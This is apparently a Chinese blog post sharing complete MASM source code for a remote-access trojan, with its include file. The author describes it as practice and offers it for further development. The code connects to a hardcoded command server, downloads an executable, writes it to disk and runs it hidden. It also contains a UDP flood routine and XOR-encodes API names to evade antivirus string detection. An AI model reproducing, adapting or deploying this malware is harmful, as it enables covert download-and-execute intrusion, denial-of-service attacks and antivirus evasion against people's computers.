分类
作品发布

自己前几天用MASM写的一个远控

最先是在看雪发的  新开空间我也没啥东西 只能拿这个凑数了
;作者:落笔飞花笑百生
;日期:2014/12/20
;用处:练手
;写一个程序虽然很烂但是确实能学到很多,用汇编写程序能逼迫自己去学习以前高级语言中容易忽略的东西虽然还是不够。
;但是至少脱离了只能用别人封装好的库来写程序的恶性循环
;这个程序也没有了写下去的意思,该解决的都解决了我实在想不出来再写他具体能得到什么
;本来想把自己实现的getFUNCaddress加进去的,也没有这样做。
;DLL名称和函数名称由于直接这样写会被某些弱智杀软杀字符串没办法只能xor简单加密一下然后取地址再动态解密一下 这样过了表面
;二次开发的人注意:xor第一个字符不加密的

include androidprotect.inc
.code
dipx byte  "192.168.0.101",0
;dipx byte "anyou5.com",0
ganraoz proc
ret

ganraoz endp
_CalcCheckSum   proc        _lpsz,_dwSize

                    local   @dwSize

                    pushad

                    mov     ecx,_dwSize

                shr     ecx,1

                xor     ebx,ebx

                mov     esi,_lpsz

;********************************************************************

; 数据包校验和为每 16 位累加

;********************************************************************

                cld

                @@:

                lodsw

                movzx   eax,ax

                add     ebx,eax

                loop        @B

;********************************************************************

; 最后如果有单 8 位则继续累加

;********************************************************************

                test        _dwSize,1

                jz      @F

                lodsb

                movzx   eax,al

                add     ebx,eax

                @@:

;********************************************************************

; 将高 16 位并入低 16 位后取反输出

;********************************************************************

                mov     eax,ebx

                and     eax,0ffffh

                shr     ebx,16

                add     eax,ebx

                not     ax

                mov     @dwSize,eax

                popad

                mov     eax,@dwSize

                ret

_CalcCheckSum   endp
udpattack proc
invoke m_socket,AF_INET, SOCK_DGRAM, 17
mov udpsock,eax
mov udpSin.sin_family, AF_INET  
invoke gethtons,udpport
mov udpSin.sin_port,ax  
invoke m_gethostbyname,offset udpip
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov udpSin.sin_addr.S_un.S_addr,eax
invoke m_setsockopt,udpsock,SOL_SOCKET,SO_SNDBUF,offset udpbuf,sizeof udpbuf
.while byte ptr [uptrue]==1
invoke GetTickCount
invoke dwtoa,eax,offset udpbuff
invoke lstrlen,offset udpbuff
invoke m_sendto,udpsock,offset udpbuff,eax,0,offset udpSin,sizeof udpSin
.endw
invoke m_closesocket,udpsock
ret

udpattack endp

stringtodw proc string:dword,strsiz:dword
;日期:2014/12/23
;用处:字符串数字无差转换成DWORD
;作者:落笔飞花笑百生
xor eax,eax
mov edi,string
xor ebx ,ebx
xor esi,esi

mov ecx,strsiz

fuckmm:
MOVZX ESI,BYTE PTR DS:[EDI]
cmp esi,0
je close
LEA EAX,DWORD PTR DS:[EBX+EBX*4]
LEA EBX,DWORD PTR DS:[ESI+EAX*2-30h]
INC EDI
loop fuckmm
close:
mov eax,ebx
ret 8
stringtodw endp
xorstring proc dstring,dsize:dword
;解密字符串
mov eax,dstring
mov ecx,dsize
@@:
inc eax
xor byte ptr [eax],5

loop @B

ret
xorstring endp
gethtons proc port :dword
;转换端口

mov eax,dword ptr ss:[ebp+8]
movzx ecx,ax
movzx eax,cl
shl eax,8
shr ecx ,8
or eax,ecx
ret

gethtons endp

midstr proc a,b,cc,d:dword
;截取字符串
push esi
push edi

xor eax,eax
xor ebx,ebx
mov eax,d
mov ebx,cc
sub eax,ebx
mov ecx,eax
cld
mov esi,a
add esi ,cc
mov edi,b
rep movsb
pop esi
pop edi
ret

midstr endp
ganraoy proc

ret

ganraoy endp

start proc
;入口
invoke GetCommandLine
call $+5
call $+5
call $+5

jmp xaxa
xaxa:
call getproaddress
invoke m_WSAStartup,0202h,offset WSAData
.repeat
invoke m_socket,AF_INET, SOCK_STREAM, IPPROTO_TCP
.if eax!=INVALID_SOCKET

mov hSock,eax
mov Sin.sin_family, AF_INET  
invoke gethtons,dport
mov Sin.sin_port,ax  
invoke m_gethostbyname,offset dipx
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov Sin.sin_addr.S_un.S_addr,eax
invoke m_connect,hSock,addr Sin,sizeof Sin

.endif
recvloop:
invoke RtlZeroMemory,offset  flag,sizeof flag
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
.while eax>0  &&eax!=INVALID_SOCKET &&eax!=SOCKET_ERROR 
invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset xz
cmp eax,0
je xxz
invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset pe
cmp eax,0
je fuckfile
jmp recvloop
;写出PE文件
fuckfile:
invoke GetCurrentDirectory,260,offset currd
invoke GetTickCount
invoke dwtoa,eax,offset filename
invoke lstrcat ,offset filename,$CTA0(".exe")
invoke lstrcat,offset currd,offset xiegang
invoke lstrcat,offset currd,offset filename
;处理要写出的文件名字和路径
invoke DeleteFile,offset currd
;会以MZ开头的
invoke CreateFile,addr currd,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hfilehandle,eax
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
loopwrite:
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
        invoke SetFilePointer,hfilehandle,NULL,NULL,FILE_END
        invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
        invoke GetFileSize,hfilehandle,NULL
        mov writebytes,eax
       cmp eax,dword ptr [dFileSize]
        je close
        jmp loopwrite

close:
invoke CloseHandle,hfilehandle
mov dword ptr [dFileSize],0;大小清空
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke WinExec,offset currd,SW_HIDE;传输完毕后执行!
invoke m_send,hSock,offset filecs,sizeof filecs,0
jmp recvloop;
xxz:
invoke lstrlen,offset recvbuff
invoke midstr,offset recvbuff,offset dFileSize,2,eax
invoke lstrlen,offset dFileSize
invoke stringtodw,offset dFileSize,eax
mov dword ptr [dFileSize],eax
invoke m_send,hSock,offset getpe,sizeof getpe,0
jmp recvloop
.endw

invoke m_closesocket,hSock
invoke Sleep,10000
.until CLOSE==TRUE
invoke m_WSACleanup  

start endp
winmain proc
invoke CreateThread,NULL,NULL,offset start,NULL,0,NULL;开启小马线程
ret

winmain endp
dwtoa proc dwValue:DWORD, lpBuffer:DWORD
;整数转换为字符串

nop
nop
nop
nop
nop
nop
nop
nop

    push ebx
    push esi
    push edi

    mov eax, dwValue
    mov edi, [lpBuffer]

    or eax,eax
    jnz sign

  zero:
    mov word ptr [edi],30h
    jmp dw2asc

  sign:
    jns pos
    mov byte ptr [edi],'-'
    neg eax
    inc edi

  pos:      
    mov ecx,429496730
    mov esi, edi

    .while (eax > 0)
      mov ebx,eax
      mul ecx
      mov eax,edx
      lea edx,[edx*4+edx]
      add edx,edx
      sub ebx,edx
      add bl,'0'
      mov [edi],bl
      inc edi
    .endw

    mov byte ptr [edi], 0       ; terminate the string

    ; We now have all the digits, but in reverse order.

    .while (esi < edi)
      dec edi
      mov al, [esi]
      mov ah, [edi]
      mov [edi], al
      mov [esi], ah
      inc esi
    .endw

    dw2asc:

    pop edi
    pop esi
    pop ebx

    ret

dwtoa endp
ganraox proc
push eax
push eax
pop eax
pop eax
mov eax,eax
ret

ganraox endp
ganraoxx proc
push eax
push eax
pop eax
pop eax
mov eax,eax
ret

ganraoxx endp
getproaddress proc
;获取API地址
invoke xorstring,offset ws32dll,sizeof ws32dll
invoke xorstring,offset wstp,sizeof wstp
invoke xorstring,offset sock,sizeof sock
invoke xorstring,offset getby,sizeof getby
invoke xorstring,offset inoa,sizeof inoa
invoke xorstring,offset inaddr,sizeof inaddr
invoke xorstring,offset cont,sizeof cont
invoke xorstring,offset recvx,sizeof recvx
invoke xorstring,offset colses,sizeof colses
invoke xorstring,offset wcl,sizeof wcl
invoke xorstring,offset sed,sizeof sed
invoke xorstring,offset sot,sizeof sot
invoke xorstring,offset sendtot,sizeof sendtot

;上面的CALL是解密字符串
invoke CreateMutex,NULL,NULL,$TA0("bixanhuxakai")
mov mxhand,eax
invoke GetLastError
.if eax== ERROR_ALREADY_EXISTS
invoke CloseHandle,offset mxhand
mov mxhand,0
invoke ExitProcess,NULL
.endif

invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wstp
mov m_WSAStartup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sock
mov m_socket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset getby
mov m_gethostbyname,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inoa
mov m_inet_ntoa,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inaddr
mov m_inet_addr,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset cont
mov m_connect,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset recvx
mov m_recv,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset colses
mov m_closesocket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wcl
mov m_WSACleanup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sed
mov m_send,eax

invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sendtot
mov m_sendto,eax

invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sot
mov m_setsockopt,eax
ret

getproaddress endp
ganrao proc
ret

ganrao endp
end winmain

下面是INC文件

.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include C:Users巫师DesktopRadASMmasm32macrosStrings.mac

_WSAStartup2 typedef proto :dword,:dword
_WSAStartup typedef ptr _WSAStartup2
_socket2 typedef proto :dword,:dword,:dword
_socket typedef ptr _socket2
_gethostbyname2 typedef proto :dword
_gethostbyname typedef ptr _gethostbyname2
_inet_ntoa2 typedef proto :dword
_inet_ntoa typedef ptr _inet_ntoa2
_inet_addr2 typedef proto :dword
_inet_addr typedef ptr _inet_addr2
_connect2 typedef proto :dword,:dword,:dword
_connect typedef ptr _connect2
_recv2 typedef proto :dword,:dword,:dword,:dword
_recv typedef ptr _recv2
_closesocket2 typedef proto :dword
_closesocket typedef ptr _closesocket2
_WSACleanup2 typedef proto
_WSACleanup typedef ptr _WSACleanup2
_send2 typedef proto :dword,:dword,:dword,:dword
_send typedef ptr _send2
_sendto2 typedef proto :dword,:dword,:dword,:dword,:dword,:dword
_sendto typedef ptr _sendto2
_setsockopt2 typedef proto :dword,:dword,:dword,:dword,:dword
_setsockopt typedef ptr _setsockopt2
getproaddress proto 
dwtoa proto :dword,:dword
gethtons proto:dword
.data?
currd byte 260 dup (?)
filename byte  50 dup (?) 
ipsize byte 50 dup (?)
recvbuff byte 1024 dup (?);1kb的缓存
Sin      sockaddr_in <>
;UDP
udpSin      sockaddr_in <>
udpbuff byte  200 dup(?)
udpbuf dd 00
udpport dd 00
udpip byte 50 dup (?)
udpsock dd 00
uptrue byte 01h
;UDP
WSAData  WSADATA <>
m_WSAStartup _WSAStartup ?
m_socket _socket ?
m_gethostbyname _gethostbyname ?
m_inet_addr _inet_addr ?
m_inet_ntoa _inet_ntoa ?
m_connect _connect ?
m_recv _recv ?
m_closesocket _closesocket ?
m_WSACleanup _WSACleanup ?
m_send _send ?
m_setsockopt _setsockopt ?
m_sendto _sendto ?
.data
hfilehandle dd 00
writebytes dd 00
oldwritebytes dd 00
dFileSize dd 00
mxhand dd 00
xz byte "XZ",0
pe byte "MZ",0
flag byte 5 dup (?)
dport dword 666
CLOSE BOOL FALSE
filecs byte "FILECSWB!",0
getpe byte "GETPE!",0
xiegang byte "",0
hSock dd 00
datalengh dd 00
ws32dll byte 077h, 076h, 037h, 05Ah, 036h, 037h, 02Bh, 061h, 069h, 069h, 0005h
xa byte 00,00
wstp byte   0057h ,0056h ,0044h ,0056h ,0071h, 0064h ,0077h ,0071h ,0070h ,0075h ,0005h
xb byte 00,00
sock byte 073h ,06Ah ,066h ,06Eh ,060h ,0071h ,005h 
xc byte 00,00
getby byte 0067h ,0060h ,0071h ,006Dh ,006Ah ,0076h ,0071h ,0067h ,007Ch ,006Bh ,0064h ,068h ,060h ,005h

xd byte 00,00
inoa byte 0069h ,006Bh ,0060h ,0071h ,005Ah ,006Bh ,0071h ,006Ah ,0064h ,005h

xe byte 00,00
inaddr byte  0069h, 006Bh, 0060h ,0071h, 005Ah, 0064h ,0061h, 0061h, 0077h, 0005h  

xf byte 00,00
cont byte 0063h ,006Ah ,006Bh ,006Bh, 0060h, 0066h, 0071h ,0005h 

xg byte 00,00
recvx byte 0072h ,0060h ,0066h ,0073h ,0005h

xh byte 00,00
colses byte  0063h ,0069h ,006Ah ,0076h ,0060h ,0076h, 006Ah, 0066h ,006Eh ,0060h ,0071h ,0005h

xi byte 00,00
wcl byte  0057h, 0056h ,0044h, 0046h, 0069h ,060h ,0064h ,006Bh ,0070h ,0075h ,0005h

xj byte 00,00
sed byte   0073h, 0060h, 006Bh, 0061h, 0005h                             

xk byte 00,00
sot byte  073h,060h,071h,076h,06Ah,066h,06Eh,06Ah,075h,071h,005h
xl byte 00,00
sendtot byte  073h,060h,06Bh,061h,071h,06Ah,005h
xm byte 00,00
0 0 vote
文章评分

由FAKE

Через тернии к звездам,
через радость и слезы
Мы проложим дорогу

Subscribe
提醒
guest
0 评论
Inline Feedbacks
View all comments